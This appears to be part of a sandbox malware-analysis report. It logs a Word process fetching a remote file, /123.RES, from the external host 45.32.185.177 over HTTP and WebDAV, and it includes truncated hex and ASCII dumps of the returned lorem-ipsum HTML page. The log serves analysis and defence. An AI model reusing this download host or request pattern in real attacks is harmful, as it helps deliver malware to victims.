        Content-Length: 5889
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Jun 7, 2022 17:33:34.256355047 CEST3INHTTP/1.1 200 OK
        Date: Tue, 07 Jun 2022 15:33:34 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
        ETag: "1701-5e0db72a43821"
        Accept-Ranges: bytes
        Content-Length: 5889
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive


        Session IDSource IPSource PortDestination IPDestination PortProcess
        2192.168.2.224917545.32.185.17780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        Jun 7, 2022 17:33:38.184900045 CEST4OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: 45.32.185.177
        Jun 7, 2022 17:33:38.208200932 CEST4INHTTP/1.1 200 OK
        Date: Tue, 07 Jun 2022 15:33:38 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 0
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html
        Jun 7, 2022 17:33:38.436250925 CEST4INHTTP/1.1 200 OK
        Date: Tue, 07 Jun 2022 15:33:38 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 0
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html
        Jun 7, 2022 17:33:39.353693008 CEST5INHTTP/1.1 405 Method Not Allowed
        Date: Tue, 07 Jun 2022 15:33:39 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 304
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
        Jun 7, 2022 17:33:39.580319881 CEST6INHTTP/1.1 405 Method Not Allowed
        Date: Tue, 07 Jun 2022 15:33:39 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 304
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
        Jun 7, 2022 17:33:41.212960005 CEST7INHTTP/1.1 405 Method Not Allowed
        Date: Tue, 07 Jun 2022 15:33:41 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 304
        Keep-Alive: timeout=5, max=98
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
        Jun 7, 2022 17:33:41.440367937 CEST15INHTTP/1.1 405 Method Not Allowed
        Date: Tue, 07 Jun 2022 15:33:41 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 304
        Keep-Alive: timeout=5, max=98
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
        Jun 7, 2022 17:33:44.502847910 CEST18INHTTP/1.1 405 Method Not Allowed
        Date: Tue, 07 Jun 2022 15:33:44 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 304
        Keep-Alive: timeout=5, max=97
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
        Jun 7, 2022 17:33:44.728271961 CEST18INHTTP/1.1 405 Method Not Allowed
        Date: Tue, 07 Jun 2022 15:33:44 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 304
        Keep-Alive: timeout=5, max=97
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
        Jun 7, 2022 17:33:45.501329899 CEST19INHTTP/1.1 405 Method Not Allowed
        Date: Tue, 07 Jun 2022 15:33:45 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 304
        Keep-Alive: timeout=5, max=96
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>
        Jun 7, 2022 17:33:45.728183031 CEST21INHTTP/1.1 405 Method Not Allowed
        Date: Tue, 07 Jun 2022 15:33:45 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Allow: GET,POST,OPTIONS,HEAD
        Content-Length: 304
        Keep-Alive: timeout=5, max=96
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 33 32 2e 31 38 35 2e 31 37 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 45.32.185.177 Port 80</address></body></html>


        Session IDSource IPSource PortDestination IPDestination PortProcess
        3192.168.2.224917645.32.185.17780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        Jun 7, 2022 17:33:41.273190975 CEST8OUTGET /123.RES HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        Host: 45.32.185.177
        Connection: Keep-Alive
        Jun 7, 2022 17:33:41.296227932 CEST9INHTTP/1.1 200 OK
        Date: Tue, 07 Jun 2022 15:33:41 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
        ETag: "1701-5e0db72a43821"
        Accept-Ranges: bytes
        Content-Length: 5889
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 75 6d 20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d
        Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus m
        Jun 7, 2022 17:33:42.952044010 CEST15OUTHEAD /123.RES HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: 45.32.185.177
        Content-Length: 0
        Connection: Keep-Alive
        Jun 7, 2022 17:33:42.975111008 CEST16INHTTP/1.1 200 OK
        Date: Tue, 07 Jun 2022 15:33:42 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
        ETag: "1701-5e0db72a43821"
        Accept-Ranges: bytes
        Content-Length: 5889
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Jun 7, 2022 17:33:45.540532112 CEST20OUTGET /123.RES HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        Host: 45.32.185.177
        If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMT
        If-None-Match: "1701-5e0db72a43821"
        Connection: Keep-Alive
        Jun 7, 2022 17:33:45.563630104 CEST20INHTTP/1.1 304 Not Modified
        Date: Tue, 07 Jun 2022 15:33:45 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
        ETag: "1701-5e0db72a43821"
        Accept-Ranges: bytes
        Keep-Alive: timeout=5, max=98
        Connection: Keep-Alive
        Jun 7, 2022 17:33:45.771857023 CEST21OUTHEAD /123.RES HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: 45.32.185.177
        Content-Length: 0
        Connection: Keep-Alive
        Jun 7, 2022 17:33:45.794852018 CEST21INHTTP/1.1 200 OK
        Date: Tue, 07 Jun 2022 15:33:45 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
        ETag: "1701-5e0db72a43821"
        Accept-Ranges: bytes
        Content-Length: 5889
        Keep-Alive: timeout=5, max=97
        Connection: Keep-Alive


        Session IDSource IPSource PortDestination IPDestination PortProcess
        4192.168.2.224917745.32.185.17780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        Jun 7, 2022 17:33:43.125586987 CEST16OUTHEAD /123.RES HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: 45.32.185.177
        Jun 7, 2022 17:33:43.148684025 CEST16INHTTP/1.1 200 OK
        Date: Tue, 07 Jun 2022 15:33:43 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
        ETag: "1701-5e0db72a43821"
        Accept-Ranges: bytes
        Content-Length: 5889
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Jun 7, 2022 17:33:43.395939112 CEST17INHTTP/1.1 200 OK
        Date: Tue, 07 Jun 2022 15:33:43 GMT
        Server: Apache/2.4.48 (Ubuntu)
        Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
        ETag: "1701-5e0db72a43821"
        Accept-Ranges: bytes
        Content-Length: 5889
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive


        No statistics
        Target ID:0
        Start time:17:33:15
        Start date:07/06/2022
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13fbf0000
        File size:1423704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        No disassembly